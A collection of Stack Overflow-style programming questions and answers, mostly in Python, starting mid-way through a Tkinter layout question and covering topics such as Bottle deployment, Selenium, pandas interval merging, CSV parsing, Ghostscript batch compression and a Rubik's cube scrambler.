command=(lambda:print('Usage'))) info.add_command(label='About', command=(lambda:print('About'))) def zipframe_create(self): self.nb.add(self.zipframe,text='Zip') self.zipframe.config(height=480,width=720) zlabel1 = ttk.Label(self.zipframe, text='Select the zip file').grid(row=0,column=0, padx=5, pady=10) zlabel2 = ttk.Label(self.zipframe, text='Select the dictionary file').grid(row=2,column=0, padx=5) ztext1 = ttk.Entry(self.zipframe, width = 50).grid(row=0,column=1,padx=5,pady=10) ztext2 = ttk.Entry(self.zipframe, width = 50).grid(row=2,column=1,padx=5) zoutput = Text(self.zipframe, width=80, height=20).grid(row=3,column=0,columnspan = 3,padx=5,pady=10) zb1 = ttk.Button(self.zipframe, text='Crack', width=10).grid(row=0,column=2,padx=5,pady=10) def scanframe_create(self): self.nb.add(self.scanframe,text='Scan') self.scanframe.config(height=480,width=720) slabel1 = ttk.Label(self.scanframe, text='IP address').grid(row=0,column=0, padx=5, pady=10) sin_put = ttk.Entry(self.scanframe, width = 50).grid(row=0,column=1,padx=5,pady=10) soutput = Text(self.scanframe, width=80, height=20).grid(row=3,column=0,columnspan = 3,padx=5,pady=10) sb1 = ttk.Button(self.scanframe, text='Scan', width=6,command= print('Content: {}'.format(sin_put.get()))).grid(row=0,column=2,padx=5,pady=10) def botframe_create(self): self.nb.add(self.botframe,text='Bot') self.botframe.config(height=480,width=720) blabel1 = ttk.Label(self.botframe, text='IP address').grid(row=0,column=0, padx=5, pady=10) blabel2 = ttk.Label(self.botframe, text='Username').grid(row=1,column=0, padx=2) blabel3 = ttk.Label(self.botframe, text='password').grid(row=2,column=0, padx=2) btext1 = ttk.Entry(self.botframe, width = 30).grid(row=0,column=1,padx=5,pady=10) btext2 = ttk.Entry(self.botframe, width = 30).grid(row=1,column=1) btext2 = ttk.Entry(self.botframe, width = 30).grid(row=2,column=1) boutput = Text(self.botframe, width=80, height=20).grid(row=3,column=0,columnspan = 3,padx=5,pady=10) bb1 = ttk.Button(self.botframe, text='Connect', width=8).grid(row=2,column=2,padx=5,pady=10) def main(): root = Tk() feedback = App(root) root.mainloop() if __name__ == "__main__": main() Answer: grid() returns None so sin_put will always equal None. Instead of passing the Tkinter ID to grid() you have to store it first if you want to reference it later. Note that for the Buttons, putting it all on one line is fine as you don't use the button's ID later. sin_put=ttk.Entry(self.scanframe, width = 50) ## stores the return ID from Entry sin_put.grid(row=0,column=1,padx=5,pady=10) ## don't catch return from grid as it is None
Confused about majorclust algorithm Question: I would like to write my own code in matlab for "majorclust" algorithm. I have document pairs having their cosine similarity. When i search through the web, i encounter this web site. <http://muse-amuse.in/~baali/MajorClustPost.html> In the example(written in Python) in this web site, the clustering part is given as follow: t = False indices = np.arange(num_of_samples) while not t: t = True for index in np.arange(num_of_samples): # aggregating edge weights new_index = np.argmax(np.bincount(indices, weights=cosine_distances[index])) if indices[new_index] != indices[index]: indices[index] = indices[new_index] t = False When i examine the sample, i am a bit confused. When we consider the for loop: for index in np.arange(num_of_samples): the first index will be "0". And maximum similarity is retrieved with "1". So the new_index must be 1 and the index "0" will be replaced by "1". On the next iteration index will be "1" and its maximum weight will come from "0" which has the same index from the previous iteration. As a result, after this point loop must terminate. This algorithm is based on the paper (given on page 4): <http://www.uni-weimar.de/medien/webis/publications/papers/stein_2002c.pdf> On the paper, it is stated that index must be chosen randomly. But in the example i could not see any random choice. What am i missing? Answer: Yes it would be good if you shuffle the indices and you can do the same using from random import shuffle shuffled_indices = np.arange(num_of_samples) shuffle(shuffled_indices) for index in shuffled_indices: # aggregating edge weights new_index = np.argmax(np.bincount(indices,weights=cosine_distances[index])) if indices[new_index] != indices[index]: indices[index] = indices[new_index] t = False Sorry for such a late reply.
sorting dictionary values in python - descending alphabetically Question: I have a dictionary:- higharr = {'Alex':2, 'Steve':3, 'Andy':4, 'Wallace':6, 'Andy':3, 'Andy':5, 'Dan':1, 'Dan':0, 'Steve':3, 'Steve':8} for score in sorted(higharr.values(), reverse=True): print (score) I would like to print out the keys with the values with the values being in descending alphabetical order. The descending part is working but I am unsure about how to add the corresponding key to the left of it. Thank you Answer: You may use another data-structure, because you have duplicate keys. But in general you might consider this: from operator import itemgetter for i in sorted(higharr.items(), key=itemgetter(1), reverse=True): print i
How I can run /myapp/my_app.py by default when accessing `localhost` using Bottle? Question: **Desired Behaviour** I want to serve content created by the file at: /myapp/my_app.py when accessing `localhost`. **Question** I know that if I add the following to `test.py` and run the file directly, the results will be accessible at `localhost:8080`: from bottle import route, run @route('/') def hello(): return "Hello World!" run(host='localhost', port=8080, debug=True) But how do I trigger this file to run by default when accessing `localhost`? **Environment** * Linux Mint 17 * MongoDB * RockMongo (Apache2, PHP, MongoDB Driver) **What I've Tried** I installed `mod_wsgi` and created `/var/www/html/myapp/app.wsgi` with this content: import bottle import os os.chdir(os.path.dirname(__file__)) @route('/') def hello(): return "Hello World!" application = bottle.default_app() And then restarted Apache. But going to `localhost` just shows a file directory. I then created `/etc/apache2/sites-enabled/mygreatapp.conf` with this content: <VirtualHost *> ServerName google.com WSGIScriptAlias / /var/www/html/myapp/app.wsgi <Directory /var/www/html/myapp> WSGIProcessGroup yourapp WSGIApplicationGroup %{GLOBAL} Order deny,allow Allow from all </Directory> </VirtualHost> But I still just see a file directory. **Official Instructions** <http://bottlepy.org/docs/dev/deployment.html#apache-mod-wsgi> **Further Information** **Troubleshooting** _See if mod_wsgi is loaded_ apache2ctl -M ... wsgi_module (shared) **Definitions** For my own reference, I'm trying to fully comprehend several elements that I think are involved in the process, feel free to correct if my understandings are wrong: **WSGI** \- A convention for how applications should communicate with servers. > It does not exist anywhere else other than as words in the [PEP > 3333](http://www.python.org/dev/peps/pep-3333/) \- > [Source](http://webpython.codepoint.net/wsgi_tutorial) **mod_wsgi** \- An Apache module that allows Python files to communicate with Apache. **Web Framework** \- See a list of them here: <https://wiki.python.org/moin/WebFrameworks> **Web Server** \- <http://en.wikipedia.org/wiki/Web_server> **Apache Server** \- <http://en.wikipedia.org/wiki/Apache_HTTP_Server> Answer: I finally have "Hello World!" displaying in the browser at `localhost`. I will paste the various required configs and files below. I'm a newb so I don't know if this is definitive or best practise. **/var/www/html/myapp/app.wsgi** # view the effect of import method: http://stackoverflow.com/a/2452639/1063287 import bottle import os os.chdir(os.path.dirname(__file__)) # note i am using bottle.route and not just route @bottle.route('/') def hello(): return "Hello World!" application = bottle.default_app() **/etc/apache2/sites-available/000-default.conf** (note: this is the default `.conf` file) <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html WSGIScriptAlias / /var/www/html/myapp/app.wsgi # just added this ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> Viewing the Apache error log is what eventually led me to try a few different things: sudo tail -100 /var/log/apache2/error.log Where I saw things like: Exception occurred processing WSGI script '/var/www/html/myapp/app.wsgi'. Traceback (most recent call last): File "/var/www/html/myapp/app.wsgi", line 8, in <module> @route('/') NameError: name 'route' is not defined This was only after I had made the step of not using a new `.conf` file and just modifying the default one. So for some reason it didn't like any new `.conf` files.
Getting output from a Python script subprocess Question: This may be a stupid question but I have a Python script that starts a subprocess (also a Python script) and I need that subprocess to return three integers. How do I get those return values from the Python script that starts the subprocess? Do I have to output the integers to stdout and then use the check_output() function? Answer: The answer is _Yes_... I want my +15 reputation!! **:-D** No, seriously... Once you start dealing with subprocesses, the only way you really have to communicate with them is through files (which is what `stdout`, `stderr` and such are, in the end) So what you're gonna have to do is grab the output and check what happened (and maybe the spawned process' `exit_code`, which will be zero if everything goes well) Bear in mind that the contents of `stdout` (which is what you'll get with the `check_output` function) is an string. So in order to get the three items, you'll have to split that string somehow... For instance: import subprocess output = subprocess.check_output(["echo", "1", "2", "3"]) print "Output: %s" % output int1, int2, int3 = output.split(' ') print "%s, %s, %s" % (int1, int2, int3)
Selenium WebDriver tests with JavaScript disabled Question: One of our internal applications (written in _angularjs_) has a special error box appearing if javascript is disabled in the browser (using [`noscript`](https://developer.mozilla.org/en- US/docs/Web/HTML/Element/noscript?redirectlocale=en- US&redirectslug=HTML%2FElement%2Fnoscript)), similar to the one on stackoverflow: ![enter image description here](http://i.stack.imgur.com/QZaVk.png) I'm trying to write an automated test for it, but having difficulties. We are using `protractor`, but I'm pretty sure this is not about it. Here is the protractor configuration file: 'use strict'; var helper = require('./helper.js'); exports.config = { seleniumAddress: 'http://localhost:4444/wd/hub', baseUrl: 'http://localhost:9001', capabilities: helper.getFirefoxProfile(), framework: 'jasmine', allScriptsTimeout: 20000, jasmineNodeOpts: { showColors: true, isVerbose: true, includeStackTrace: true } }; where `helper.js` is: var q = require('q'); var FirefoxProfile = require('firefox-profile'); exports.getFirefoxProfile = function() { var deferred = q.defer(); var firefoxProfile = new FirefoxProfile(); firefoxProfile.setPreference("javascript.enabled", false); firefoxProfile.encoded(function(encodedProfile) { var capabilities = { 'browserName': 'firefox', 'firefox_profile' : encodedProfile, 'specs': [ '*.spec.js' ] }; deferred.resolve(capabilities); }); return deferred.promise; }; As you see, we are setting `javascript.enabled` firefox preference to `false` which has been proven to work if you manually open up `about:config` in firefox, change it to `false` \- you would see the contents of `noscript` section. But, when I run the tests, I am getting the following error: > Exception thrown org.openqa.selenium.WebDriverException: waiting for > evaluate.js load failed Here is the [complete traceback](https://gist.github.com/alecxe/8247dd77d55ea34c8916). FYI, selenium `2.44.0` and firefox `33.1.1` are used. As far as I understand (with the help of several points raised [here](http://yizeng.me/2014/01/08/disable-javascript-using-selenium- webdriver/)), **disabling javascript is killing the javascript webdriver itself**. Is it true? If yes, what are my options or workarounds? * * * Notes: * in case of chrome, in the past it was possible to disable javascript via [`--disable-javascript` command-line argument](http://peter.sh/experiments/chromium-command-line-switches/#disable-javascript), but [not](https://code.google.com/p/selenium/issues/detail?id=3175) [anymore.](https://code.google.com/p/selenium/issues/detail?id=6672) * this leads to a workaround number 0 - downgrade chrome to an old version which supported the command-line flag - this would be a not-tested plan B * setting `javascript.enabled=false` firefox preference works with _python selenium bindings_ : from selenium import webdriver profile = webdriver.FirefoxProfile() profile.set_preference('javascript.enabled', False) driver = webdriver.Firefox(firefox_profile=profile) driver.get('https://my_internal_url.com') # no errors and I can assert the error is present I'm open to any suggestions and can provide you with any additional information. Answer: > As far as I understand (with the help of several points raised here), > disabling javascript is killing the javascript webdriver itself. Is it true? Yes. Note that WebDriver itself runs as a Firefox extension, so its code isn't affected by you disabling JavaScript. However, the error message indicates that Selenium is attempting to run some code in the context of the webpage. For that it injects a `<script>` tag into the webpage and puts the contents of `evaluate.js` into it. Then it waits for that script to set a flag indicating that it is ready - something that never happens of course because scripts aren't running in that webpage. > If yes, what are my options or workarounds? The important question is what Selenium is trying to run there. Your traceback is merely indicating that some code is calling `executeScript()` or `executeAsyncScript()`. I couldn't find any implied calls to either method in the Selenium codebase (at least not in any files related to Firefox web driver). Given that Selenium is open source, you should be able to debug it and add a breakpoint on `org.openqa.selenium.remote.RemoteWebDriver.executeScript()` and `org.openqa.selenium.remote.RemoteWebDriver.executeAsyncScript()` \- that way you will actually see the script being executed there. Alternatively, you can also recompile `RemoteWebDriver.java` and make it produce debugging output. Looking into how these methods are implemented, there might also be another way: telling Selenium that JavaScript is disabled. This should work via capabilities: 'javascriptEnabled': false, According to documentation this capability only works on HTMLUnitDriver, yet Selenium will always consider it and from the source code specifying it for Firefox seems possible. With this capability any calls executing scripts on web pages will fail early.
Where is mimetools.choose_boundary function in Python3? Question: I currently want to use the following piece of code in Python3, but found the function `mimetools.choose_boundary` to be deprecated, how to change the code and make it works? import re from urllib.request import urlopen, Request import os import mimetypes import mimetools def get_content_type(filepath): return mimetypes.guess_type(filepath)[0] or 'application/octet-stream' def encode_multipart_formdata(fields, files=[]): """ fields is a sequence of (name, value) elements for regular form fields. files is a sequence of (name, filepath) elements for data to be uploaded as files Return (content_type, body) ready for httplib.HTTP instance """ BOUNDARY = mimetools.choose_boundary() CRLF = '\r\n' L = [] for (key, value) in fields: L.append('--' + BOUNDARY) L.append('Content-Disposition: form-data; name="%s"' % key) L.append('') L.append(value) for (key, filepath) in files: L.append('--' + BOUNDARY) L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, os.path.basename(filepath))) L.append('Content-Type: %s' % get_content_type(filepath)) L.append('') L.append(open(filepath, 'rb').read()) L.append('--' + BOUNDARY + '--') L.append('') body = CRLF.join(L) content_type = 'multipart/form-data; boundary=%s' % BOUNDARY return content_type, body Answer: Well, I answer my question since no other available answer here. Yes, I got the result finally, for more info about my work around the question, the below information may help. * * * ### 1\. What does `boundary` do in an `multipart/form-data` request? In fact, to separate the different parts of data is such a request, we use a separator, here we call `boundary`, to divide the form data. These parts may be field value _(plain text)_ , or uploading file contents. ### 2\. First we put the boundary string in the request header. To claim a request to be accepted as a `mulitipart/form-data` format, we first choose a special string, called `boundary`, and put it in the request header: Content-Type: multipart/form-data; boundary=FORM-BOUNDARY Seeing that we choose the boundary string to be `FORM-BOUNDARY` here, in fact we can choose any string we want. Most time we may choose a long, randomly string, to prevent collision. ### 3\. Use the chosen boundary in the request body. In the request body _(payload)_ , we separate the data with the `boundary` separator, for example: --FORM-BOUNDARY Content-Disposition: form-data; name="template"; filename=".xls" Content-Type: application/vnd.ms-excel A654ADE5^%^#%@%$@ (BINARY DATA IN THIS SECTION) --FORM-BOUNDARY Content-Disposition: form-data; name="username" admin --FORM-BOUNDARY Content-Disposition: form-data; name="password" admin_password --FORM-BOUNDARY-- Seeing that, we start one form-part with a separator, with the `boundary` after a single `--` symbol. Then in that form-part, we export the header to claim the content type and the name of that posted field. Then a single blank line is required. Then we export the value(data) of that form-part. After all form-parts, we ended the request body with a separator, with the `boundary` between two `--` symbol. ### 4\. So what does `mimetools.choose_boundary` do then? In fact, this function (deprecated since py3) generate a random boundary, with a specified format, see: <https://docs.python.org/2.7/library/mimetools.html?highlight=choose_boundary#mimetools.choose_boundary> The format is: 'hostipaddr.uid.pid.timestamp.random' Just that simple. If we insist on getting the same result, 1. we can write the functional by ourselves. 2. Or call the `email.generator` module's `_make_boundary()` function. > But in fact, to make it work, no need to do that, just generate a random > string to replace it!
Conda doesn't find existent binstar package Question: I'm trying to install the hdf5storage package for my Python 3 installation on a 64-Bit Windows 8 machine using Anaconda. Just to make sure that everything was up to date, I did a C:\Users\Baeuerle>conda install binstar Fetching package metadata: .. Solving package specifications: . Package plan for installation in environment C:\Anaconda3: The following packages will be downloaded: package | build ---------------------------|----------------- binstar-0.9.4 | py34_0 115 KB clyent-0.3.2 | py34_0 13 KB conda-3.7.3 | py34_0 202 KB pytz-2014.9 | py34_0 167 KB requests-2.4.3 | py34_0 607 KB setuptools-7.0 | py34_0 749 KB ------------------------------------------------------------ Total: 1.8 MB The following NEW packages will be INSTALLED: clyent: 0.3.2-py34_0 The following packages will be UPDATED: binstar: 0.7.1-py34_0 --> 0.9.4-py34_0 conda: 3.7.0-py34_0 --> 3.7.3-py34_0 pytz: 2014.7-py34_0 --> 2014.9-py34_0 requests: 2.4.1-py34_0 --> 2.4.3-py34_0 setuptools: 5.8-py34_0 --> 7.0-py34_0 Proceed ([y]/n)? Fetching packages ... binstar-0.9.4- 100% |###############################| Time: 0:00:01 109.73 kB/s clyent-0.3.2-p 100% |###############################| Time: 0:00:00 25.88 kB/s conda-3.7.3-py 100% |###############################| Time: 0:00:05 39.58 kB/s pytz-2014.9-py 100% |###############################| Time: 0:00:00 179.44 kB/s requests-2.4.3 100% |###############################| Time: 0:00:02 210.03 kB/s setuptools-7.0 100% |###############################| Time: 0:01:30 8.45 kB/s setuptools-7.0 100% |###############################| Time: 0:00:03 216.41 kB/s Extracting packages ... [ COMPLETE ] |#################################################| 100% Unlinking packages ... [ COMPLETE ] |#################################################| 100% Linking packages ... [ COMPLETE ] |#################################################| 100% first. Then I did: C:\Users\Baeuerle>binstar show auto/hdf5storage Using binstar api site https://api.binstar.org Name: hdf5storage Summary: https://github.com/frejanordsiek/hdf5storage Access: public Package Types: conda Versions: + 0.1.1 To install this package with conda run: conda install --channel https://conda.binstar.org/auto hdf5storage C:\Users\Baeuerle>conda install --channel https://conda.binstar.org/auto hdf5storage Fetching package metadata: ... Error: No packages found in current win-64 channels matching: hdf5storage You can search for this package on Binstar with binstar search -t conda hdf5storage C:\Users\Baeuerle> So what's the problem here? Obviously the package is there and I used the recommended command. Why can't conda find it then? Is this an 64-bit issue and if so what would be the best way to install hdf5storage through anaconda? Answer: I had the exact same problem with the graph-tool package and the sigcpp dependency. I'm on osx Yosemite 10.10. I wanted to install graph-tool. Found the right package for osX on binstar. conda install --channel https://conda.anaconda.org/vgauthier graph-tool and always had the following message Error: Could not find some dependencies for graph-tool: sigcpp Although sigcpp was already installed conda install sigcpp Fetching package metadata: .......... Solving package specifications: . # All requested packages already installed. # packages in environment at /Users/aperrier/anaconda/envs/py34: # sigcpp 2.3.1 2 What ended up working is to add the channel first to conda and then to install sigcpp and graph-tool conda config --add channels https://conda.binstar.org/cyclus conda install sigcpp Was told that the package was already existing. However then graph-tool install worked conda config --add channels https://conda.binstar.org/vgauthier conda install graph-tool And I was able to finally import graph_tool in ipython This makes no sense to me but maybe that will help someone with the same problem.
Regular string of hex values to binary string Question: I am writing a file-data searching script and want to allow the user to search for a string of hex values (via `argv`). I had to switch from PHP to Python because the maximum value of integers are (too) limited on 32-bit PHP/machines. In PHP I could just do: $SearchValue = pack('H*', $Input); However, in Python there does not seem to be any equivalent for this format character. What are some alternatives for this conversion in Python, if any? The output needs to be a binary string (`b'...'`). I am quite new to Python so please bare with me. Answer: 3>> import binascii 3>> binascii.unhexlify('deadbeef') b'\xde\xad\xbe\xef'
"_csv.Error: line contains NULL byte" in CSV reader from STDIN Question: There are many StackOverflow questions about this error when reading from a **_CSV_** file. My problem is occurring while reading from **_STDIN_**. `[Most SO solutions talk about tweaking the open() command which works for opening CSV files - not for reading them through STDIN]. My problem is with reading through STDIN. So please don't mark this as a duplicate.` My python code is: import sys , csv def main(argv): reader = csv.reader(sys.stdin, delimiter=',') for line in reader: print line and the returned error is: Traceback (most recent call last): File "mapper.py", line 19, in <module> main(sys.argv) File "mapper.py", line 4, in main for line in reader: _csv.Error: line contains NULL byte It would suffice me to simply ignore that line where the NULL byte occurs (if that is possible) in the for loop. Answer: i solved it by handling CSV exception import sys , csv def main(argv): reader = csv.reader(sys.stdin, delimiter=',') lineCount = 0 errorCount = 0 while True: # keep iterating indefinitely until exception is raised for end of the reader (an iterator) try: lineCount += 1 line = next(reader) print "%d - %s" % (lineCount , line) except csv.Error: # this exception is raised when a malformed CSV is encountered... ignore it and continue errorCount += 1 continue except StopIteration: # this exception is raised when next() reaches the end of the iterator lineCount -= 1 break print "total line: %d" % lineCount print "total error: %d" % errorCount
Alarm will not be triggered in Python 2.7 program Question: I'm trying to make a command line alarm clock application. The way it's supposed to work is that when the current hour and the current minute are the same as the hour and minute you want to wake up at, it will exit the `while` loop and wake you up. However, when the hour and the minute are the same as the current it just keeps going. I've attempted to google for an answer but I haven't been able to find relevant information. import sys import datetime a = 0 current_time = datetime.datetime.now() print current_time.hour print current_time.minute wakehour = raw_input("When do you wanna wake up?\n What hour? Use the 24-hour clock.\n>>>") wakeminute = raw_input("How many minutes after the hour?\n>>>") print wakehour print wakeminute while a == 0: current_time = datetime.datetime.now() print current_time.hour print current_time.minute if current_time.hour == wakehour and current_time.minute == wakeminute: print 'wakey wakey' a = 1 Answer: When you ask a `raw_input` the result is a string: >>> a=raw_input() 1 >>> type(a) <type 'str'> But `current_time.hour` is an int: >>> current_time = datetime.datetime.now() >>> type(current_time.hour) <type 'int'> So, try to convert `wakehour`/`wakeminute` to int before the conversion with `int(wakehour)`
Comparing row values in pandas dataframe Question: I have data in a pandas dataframe where two columns contain numerical sequences (start and stop). I want to identify which rows have stop values which overlap with the next rows' start values. Then I need to concatenate them into a single row so that I only have single none-overlapping numerical sequences represented by my start and stop values in each row. I have loaded my data into a pandas dataframe: > > chr start stop geneID > 0 chr13 32889584 32889814 BRCA2 > 1 chr13 32890536 32890737 BRCA2 > 2 chr13 32893194 32893307 BRCA2 > 3 chr13 32893282 32893400 BRCA2 > 4 chr13 32893363 32893466 BRCA2 > 5 chr13 32899127 32899242 BRCA2 > I want to compare the rows in the dataframe. Check whether the stop value for each row is less than the start value for the following row and then create a row in a new dataframe with the correct start and stop values. Ideally when there are several rows which all overlap this would be concatenated all in one go, however I suspect I will have to iterate over my output until this doesn't happen any more. My code so far can identify whether there is an overlap (adapted from [this post](http://stackoverflow.com/questions/19409335/comparing-pandas-dataframe- rows-dropping-rows-with-overlapping-dates)): import pandas as pd import numpy as np columns = ['chr','start','stop','geneID'] bed = pd.read_table('bedfile.txt',sep='\s',names=['chr','start','stop','geneID'],engine='python') def bed_prepare(inp_bed): inp_bed['next_start'] = inp_bed['start'].shift(periods=-1) inp_bed['distance_to_next'] = inp_bed['next_start'] - inp_bed['stop'] inp_bed['next_region_overlap'] = inp_bed['next_start'] < inp_bed['stop'] intermediate_bed = inp_bed return intermediate_bed And this gives me output like this: print bed_prepare(bed) > > chr start stop geneID next_start distance_to_next > next_region_overlap > 0 chr13 32889584 32889814 BRCA2 32890536 722 > False > 1 chr13 32890536 32890737 BRCA2 32893194 2457 > False > 2 chr13 32893194 32893307 BRCA2 32893282 -25 > True > 3 chr13 32893282 32893400 BRCA2 32893363 -37 > True > 4 chr13 32893363 32893466 BRCA2 32899127 5661 > False > I want to put this intermediate dataframe into the following function in order get the desired output (shown below): new_bed = pd.DataFrame(data=np.zeros((0,len(columns))),columns=columns) def bed_collapse(intermediate_bed, new_bed,columns=columns): for row in bed.itertuples(): output = {} if row[7] == False: # If row doesn't overlap next row, insert into new dataframe unchanged. output_row = list(row[1:5]) if row[7] == True: # For overlapping rows take the chromosome and start coordinate output_row = list(row[1:3]) # Iterate to next row bed.itertuples().next() # Append stop coordinate and geneID output_row.append(row[3]) output_row.append(row[4]) #print output_row for k, v in zip(columns,output_row): otpt[k] = v #print output new_bed = new_bed.append(otpt,ignore_index=True) output_bed = new_bed return output_bed int_bed = bed_prepare(bed) print bed_collapse(int_bed,new_bed) Desired output: > > chr start stop geneID > 0 chr13 32889584 32889814 BRCA2 > 1 chr13 32890536 32890737 BRCA2 > 2 chr13 32893194 32893466 BRCA2 > 5 chr13 32899127 32899242 BRCA2 > However, when I run the function I get my original dataframe back unchanged. I know that the problem is when I try to call bed.itertuples().next(), as this is clearly not quite the right syntax/location for the call. But I don't know the correct way to rectify this. Some pointers would be great. SB :) ## Update This is a [BED file](http://genome.ucsc.edu/FAQ/FAQformat.html#format1) where each row refers to an amplicon (genomic region) with start and stop coordinates. Some of the amplicons overlap; ie the start coordinate is before the stop coordinate on the previous row. Therefore I need to identify which rows overlap and concatenate the correct starts and stops so that each row represents and entirely unique amplicon which doesn't overlap any other row. Answer: I will try to give you some pointers. One pointer is that you want the get the rows based on a Series consisting of booleans that is shifted. Probably you can get a new shifted Series using: Boolean_Series = intermediate_bed.loc[:,'next_region_overlap'].shift(periods=1, freq=None, axis=0, **kwds) More background about this function: <http://pandas.pydata.org/pandas- docs/dev/generated/pandas.DataFrame.shift.html> Second pointer is that by using this shifted Series you can get your Dataframe by: int_bed = bed.loc[Boolean_Series, :] More about indexing can be found here: <http://pandas.pydata.org/pandas- docs/dev/indexing.html> These are only pointers now, I do not know if this an actual working solution.
Script to compress all pdf files in a directory Question: I wish to compress all pdf files in a directory using ghostscript. I thought of using python to read files and the gs command that compress pdf is from __future__ import print_function import os for path, dirs, files in os.walk("/home/mario/books"): for file in files: if file.endswith(".pdf"): filename = os.path.join(root, file) gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen -dNOPAUSE -dBATCH -dQUIET -sOutputFile=file filename This gives syntax error at "/screen", For a single file below command works fine gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen -dNOPAUSE -dBATCH -dQUIET -sOutputFile=output.pdf input.pdf Could someone help me correcting this script or alternate solution? Answer: Thanks for suggestion tdelaney I tried subprocess.call which helped. Below is the code solved the problem. from __future__ import print_function import os import subprocess for root, dirs, files in os.walk("."): for file in files: if file.endswith(".pdf"): filename = os.path.join(root, file) arg1= '-sOutputFile=' +"v"+ file p = subprocess.Popen(['/usr/bin/gs', '-sDEVICE=pdfwrite', '-dCompatibilityLevel=1.4', '-dPDFSETTINGS=/screen', '-dNOPAUSE', '-dBATCH', '-dQUIET', str(arg1), filename], stdout=subprocess.PIPE) print (p.communicate()) Also find ... -exec is good option for shell script though.
Infinite loop - Rubiks cube scrambler Question: I'm having a little problem with Rubiks Cube scrambler in python. There is my code: __author__ = 'Mors' from random import randint moves = ["F", "F'", "R", "R'", "L", "L'", "U", "U'", "D", "D'", "B", "B'", "F2", "R2", "L2", "U2", "D2", "B2"] scramble = [] lenght = len(scramble) lenght_moves = len(moves) - 1 def good_move(scramble, lenght): if scramble[lenght] == "R" or scramble[lenght] == "R'" or scramble[lenght] == "R2": if scramble[lenght - 1] == "R" or scramble[lenght - 1] == "R'" or scramble[lenght - 1] == "R2": return False if scramble[lenght] == "L" or scramble[lenght] == "L'" or scramble[lenght] == "L2": if scramble[lenght - 1] == "L" or scramble[lenght - 1] == "L'" or scramble[lenght - 1] == "L2": return False if scramble[lenght] == "F" or scramble[lenght] == "F'" or scramble[lenght] == "F2": if scramble[lenght - 1] == "F" or scramble[lenght - 1] == "F'" or scramble[lenght - 1] == "F2": return False if scramble[lenght] == "U" or scramble[lenght] == "U'" or scramble[lenght] == "U2": if scramble[lenght - 1] == "U" or scramble[lenght - 1] == "U'" or scramble[lenght - 1] == "U2": return False if scramble[lenght] == "D" or scramble[lenght] == "D'" or scramble[lenght] == "D2": if scramble[lenght - 1] == "D" or scramble[lenght - 1] == "D'" or scramble[lenght - 1] == "D2": return False if scramble[lenght] == "B" or scramble[lenght] == "B'" or scramble[lenght] == "B2": if scramble[lenght - 1] == "B" or scramble[lenght - 1] == "B'" or scramble[lenght - 1] == "B2": return False return True while (lenght < 20): print (lenght) print (scramble) random = randint(0, lenght_moves) if lenght - 1 >= 1: if good_move(scramble, lenght - 1) == False: print ("I'm here") while (good_move(scramble, lenght - 1)) != False: random = randint(0, lenght_moves) print (random) scramble.remove(lenght - 1) scramble.append(moves[random]) else: scramble.append(moves[random]) else: scramble.append(moves[random]) lenght = len(scramble) print (scramble) So, when I'm running my program, he is going to if lenght - 1 >= 1: if good_move(scramble, lenght - 1) == False: print ("I'm here") while (good_move(scramble, lenght - 1)) != False: random = randint(0, lenght_moves) print (random) scramble.remove(lenght - 1) scramble.append(moves[random]) And he is looping up... I tried with "i" instead of "length - 1" but it didn't work (index out of range etc.). moves = ["F", "F'", "R", "R'", "L", "L'", "U", "U'", "D", "D'", "B", "B'", "F2", "R2", "L2", "U2", "D2", "B2"] scramble = [] length = len(scramble) length_moves = len(moves) - 1 def good_move(scramble, length): if scramble[length] == "R" or scramble[length] == "R'" or scramble[length] == "R2": if scramble[length - 1] == "R" or scramble[length - 1] == "R'" or scramble[length - 1] == "R2": return False if scramble[length] == "L" or scramble[length] == "L'" or scramble[length] == "L2": if scramble[length - 1] == "L" or scramble[length - 1] == "L'" or scramble[length - 1] == "L2": return False if scramble[length] == "F" or scramble[length] == "F'" or scramble[length] == "F2": if scramble[length - 1] == "F" or scramble[length - 1] == "F'" or scramble[length - 1] == "F2": return False if scramble[length] == "U" or scramble[length] == "U'" or scramble[length] == "U2": if scramble[length - 1] == "U" or scramble[length - 1] == "U'" or scramble[length - 1] == "U2": return False if scramble[length] == "D" or scramble[length] == "D'" or scramble[length] == "D2": if scramble[length - 1] == "D" or scramble[length - 1] == "D'" or scramble[length - 1] == "D2": return False if scramble[length] == "B" or scramble[length] == "B'" or scramble[length] == "B2": if scramble[length - 1] == "B" or scramble[length - 1] == "B'" or scramble[length - 1] == "B2": return False return True i = 0 while (i < 20): print (length) print (scramble) random = randint(0, length_moves) if i >= 2: if good_move(scramble, i) == False: print ("I'm here") while (good_move(scramble, i)) != False: random = randint(0, length_moves) print (random) scramble.remove(i) scramble.append(moves[random]) else: scramble.append(moves[random]) else: scramble.append(moves[random]) i += 1 print (scramble) For example, in second code i put "i" insted of lenght and when my program is meeting function, he is telling that "index is out of range" I don't know why, if i >= 2 it can't be out of range because "lenght"(in function) == 1,2,3 and so on and "lenght - 1" == 0,1,2. Any ideas how to solve this problem? BTW. For example correct scramble to Rubiks Cube: R2 U2 R2 B' U2 B2 R2 F' U2 L' B2 F2 U' F2 R' B D R B R' **Be careful! If u run this code, your computer will get lag (infinite loop)** Answer: if good_move(scramble, lenght - 1) == False: print ("I'm here") while (good_move(scramble, lenght - 1)) != False: This is the first problem. The `while` loop will never be entered here, because `good_move` will certainly be false when you reach the `print` line. Perhaps you meant to have the same condition each time. if good_move(scramble, lenght - 1) == False: print ("I'm here") while (good_move(scramble, lenght - 1)) == False: * * * scramble.remove(lenght - 1) This is the second problem. `list.remove(x)` does not remove `list[x]` from the list. It searches through the list for the first instance of x and removes it, no matter where it is. If you want to remove the last element of the list, you can slice it off. scramble = scramble[:-1] Or delete it. del scramble[-1] * * * Now your program should end properly. Sample result: ["F'", 'D', 'B', 'D', 'B2', "U'", 'R2', 'L2', "D'", 'B2', 'F', "R'", 'B2', 'R', "F'", "R'", "B'", 'U2', 'F', 'L2']
